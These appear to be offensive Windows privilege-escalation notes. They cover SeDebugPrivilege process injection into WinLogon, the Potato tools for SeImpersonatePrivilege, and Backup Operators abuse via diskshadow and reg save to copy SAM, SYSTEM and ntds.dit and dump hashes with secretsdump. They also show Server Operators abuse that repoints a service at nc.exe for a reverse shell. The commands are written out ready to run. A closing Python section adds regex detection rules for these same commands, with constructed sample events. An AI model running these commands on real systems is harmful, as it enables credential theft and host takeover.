Windows Local Privilege Escalation
SeDebugPrivilege
With SeDebugPrivilege, migrate into a privileged process such as WinLogon, here by using ProcessInjection to load the adopt binary into it.
WinLogon PID: 3488
Adopt binary: adopt.exe
PS /bob> dotnet inline-execute /home/user/ProcessInjection.exe /f:raw /pid:3488 /t:1 /path:C:\Windows\Tasks\adopt.exe
SeImpersonatePrivilege
Usually web (IIS) service accounts have this enabled.
- Use GodPotato or PrintSpoofer to privesc.
Backup Operators
PS /bob> cd c:\temp
PS /temp> echo "set context persistent nowriters" | out-file ./diskshadow.txt -encoding ascii
PS /temp> echo "add volume c: alias temp" | out-file ./diskshadow.txt -encoding ascii -append
PS /temp> echo "create" | out-file ./diskshadow.txt -encoding ascii -append
PS /temp> echo "expose %temp% z:" | out-file ./diskshadow.txt -encoding ascii -append
PS /temp> diskshadow.exe /s c:\temp\diskshadow.txt
Through Evil-WinRM (which provides upload/download commands); disk.txt is a diskshadow script of the same form as above, exposing the shadow copy as E: (the drive used below):
PS /bob> upload disk.txt C:\Windows\Temp\disk.txt
PS /bob> diskshadow.exe /s C:\Windows\Temp\disk.txt
PS /bob> E:
PS /bob> reg save hklm\system c:\windows\temp\system.bak
PS /bob> reg save hklm\sam c:\windows\temp\sam.bak
PS /bob> upload ./SeBackupPrivilegeCmdLets.dll
PS /bob> upload ./SeBackupPrivilegeUtils.dll
PS /bob> Import-Module .\SeBackupPrivilegeUtils.dll
PS /bob> Import-Module .\SeBackupPrivilegeCmdLets.dll
PS /bob> Copy-FileSeBackupPrivilege e:\windows\ntds\ntds.dit c:\windows\temp\ntds.dit
PS /bob> cd c:\windows\temp
PS /windows/temp> download ntds.dit
PS /windows/temp> download sam.bak
PS /windows/temp> download system.bak
Then, on your Linux machine, use the three downloaded files to dump the hashes (the -hashes option is only for remote authentication and is not needed with a LOCAL target):
bobbuilder:/home# impacket-secretsdump -ntds ntds.dit -system system.bak -sam sam.bak LOCAL -outputfile ntlm-extract
Server Operators
Members can reconfigure services; here the VSS service binary path is repointed at nc.exe (upload is an Evil-WinRM command, and sc.exe requires a space after "binPath=").
PS /bob> upload /usr/share/windows-resources/binaries/nc.exe
PS /bob> sc.exe config vss binPath= "C:\Path\nc.exe -e cmd.exe ip 1234"
PS /bob> sc.exe stop vss
PS /bob> sc.exe start vss
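As an added detection-side example (not part of these notes), the following Python flags the command patterns shown above in constructed process-creation and script-block records; the rule names, record fields and sample events are assumptions, not real telemetry.

```python
"""Flag the privilege-abuse command patterns from these notes in endpoint
telemetry (e.g. Sysmon Event ID 1 / 4688 CommandLine, or 4104 script blocks).
Added example, not part of the original notes; all sample records are constructed."""
import re

# (rule name, regex applied to the lowercased command line). Each pattern mirrors
# one of the commands above; tune the paths and flags to your own environment.
RULES = [
    ("diskshadow_script", re.compile(r"\bdiskshadow(\.exe)?\s+/s\s+")),
    ("hive_save_sam_system", re.compile(r"\breg(\.exe)?\s+save\s+hklm\\(sam|system)\b")),
    ("ntds_copy_backup_priv", re.compile(r"copy-filesebackupprivilege.*ntds\.dit")),
    ("service_binpath_tamper", re.compile(r"\bsc(\.exe)?\s+config\s+\S+\s+binpath=")),
    ("nc_reverse_shell", re.compile(r"\bnc(\.exe)?\b.*\s-e\s+cmd(\.exe)?\b")),
]


def classify(event):
    """Return the names of every rule that matches one event dict."""
    cmd = event.get("CommandLine", "").lower()
    return [name for name, rx in RULES if rx.search(cmd)]


def scan(events):
    """Return (EventId, User, [rule names]) for each event hitting at least one rule."""
    hits = []
    for ev in events:
        names = classify(ev)
        if names:
            hits.append((ev["EventId"], ev["User"], names))
    return hits


# Constructed records modelled on the commands in these notes (ATTACKER_IP is a placeholder).
SAMPLE_EVENTS = [
    {"EventId": 1, "User": "CORP\\bob", "CommandLine": r"diskshadow.exe /s C:\Windows\Temp\disk.txt"},
    {"EventId": 2, "User": "CORP\\bob", "CommandLine": r"reg save hklm\sam c:\windows\temp\sam.bak"},
    # A 4104 script-block record: the cmdlet runs inside PowerShell, not as its own process.
    {"EventId": 3, "User": "CORP\\bob",
     "CommandLine": r"Copy-FileSeBackupPrivilege e:\windows\ntds\ntds.dit c:\windows\temp\ntds.dit"},
    {"EventId": 4, "User": "CORP\\svc_backup", "CommandLine": r"C:\Backup\agent.exe --full --target \\nas\backups"},
    {"EventId": 5, "User": "CORP\\bob",
     "CommandLine": r'sc.exe config vss binPath= "C:\Path\nc.exe -e cmd.exe ATTACKER_IP 1234"'},
    {"EventId": 6, "User": "NT AUTHORITY\\SYSTEM", "CommandLine": r"C:\Windows\System32\svchost.exe -k netsvcs"},
]

if __name__ == "__main__":
    for event_id, user, names in scan(SAMPLE_EVENTS):
        print(f"event {event_id} user={user} rules={names}")
```

Legitimate backup and service-management tooling also produces some of these command lines, so correlate hits with the user's group membership (Backup Operators, Server Operators) and with the parent process before alerting.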